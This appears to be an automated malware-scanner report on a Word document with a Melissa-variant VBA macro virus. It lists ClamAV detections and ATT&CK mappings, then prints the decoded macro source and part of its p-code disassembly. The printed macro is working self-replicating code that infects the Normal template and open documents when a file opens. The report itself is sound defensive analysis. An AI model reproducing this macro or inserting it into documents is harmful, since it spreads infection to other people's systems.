MALICIOUS
180
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1547.001 Registry Run Keys / Startup Folder
The sample contains a VBA macro that is triggered by the Document_Open event. This macro is designed to copy itself into the Normal template and the active document, a common technique for establishing persistence or enabling further malicious actions. The presence of ClamAV detections for 'Doc.Trojan.Assilem-2' and 'Doc.Trojan.Venom-1' strongly indicates malicious intent, likely related to malware distribution.
Heuristics 3
-
ClamAV: Doc.Trojan.Assilem-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Trojan.Assilem-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6878 bytes |
SHA-256: 1643934f464e99a87689354b1051942cb2317ad3ce659075af7ad6bcd249c7ca |
|||
|
Detection
ClamAV:
Doc.Trojan.Venom-1
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Melissa"
Attribute VB_Base = "1Normal.Melissa"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
''Works in both Word 2000 and Word 97
''Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub
' Processing file: /opt/analyzer/scan_staging/43cc9ca65f344e2f89308c93286d8b50.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Melissa - 3652 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' SetStmt
' LitDI2 0x0001
' Ld ActiveDocument
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set ADI1
' Line #2:
' SetStmt
' LitDI2 0x0001
' Ld NormalTemplate
' MemLd VBProject
' MemLd VBComponents
' ArgsMemLd Item 0x0001
' Set NTI1
' Line #3:
' Ld NTI1
' MemLd CodeModule
' MemLd CountOfLines
' St NTCL
' Line #4:
' Ld ADI1
' MemLd CodeModule
' MemLd CountOfLines
' St ADCL
' Line #5:
' LitDI2 0x0002
' St BGN
' Line #6:
' Ld ADI1
' MemLd New
' LitStr 0x0007 "Melissa"
' Ne
' IfBlock
' Line #7:
' LineCont 0x0004 05 00 00 00
' Ld ADCL
' LitDI2 0x0000
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' Ld ADCL
' Ld ADI1
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' EndIf
' Line #8:
' SetStmt
' Ld ADI1
' Set ToInfect
' Line #9:
' LitStr 0x0007 "Melissa"
' Ld ADI1
' MemSt New
' Line #10:
' LitVarSpecial (True)
' St DoAD
' Line #11:
' EndIfBlock
' Line #12:
' Ld NTI1
' MemLd New
' LitStr 0x0007 "Melissa"
' Ne
' IfBlock
' Line #13:
' LineCont 0x0004 05 00 00 00
' Ld NTCL
' LitDI2 0x0000
' Gt
' If
' BoSImplicit
' LitDI2 0x0001
' Ld NTCL
' Ld NTI1
' MemLd CodeModule
' ArgsMemCall DeleteLines 0x0002
' EndIf
' Line #14:
' SetStmt
' Ld NTI1
' Set ToInfect
' Line #15:
' LitStr 0x0007 "Melissa"
' Ld NTI1
' MemSt New
' Line #16:
' LitVarSpecial (True)
' St DoNT
' Line #17:
' EndIfBlock
' Line #18:
' Ld DoNT
' LitVarSpecial (True)
' Ne
' Ld DoAD
' LitVarSpecial (True)
' Ne
' And
' If
' BoSImplicit
' GoTo CYA
' EndIf
' Line #19:
' Ld DoNT
' LitVarSpecial (True)
' Eq
' IfBlock
' Line #20:
' LitDI2 0x0001
' LitDI2 0x0001
' Ld ADI1
' MemLd CodeModule
' ArgsMemLd Lines 0x0002
' LitStr 0x0000 ""
' Eq
' DoWhile
' Line #21:
' Li
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.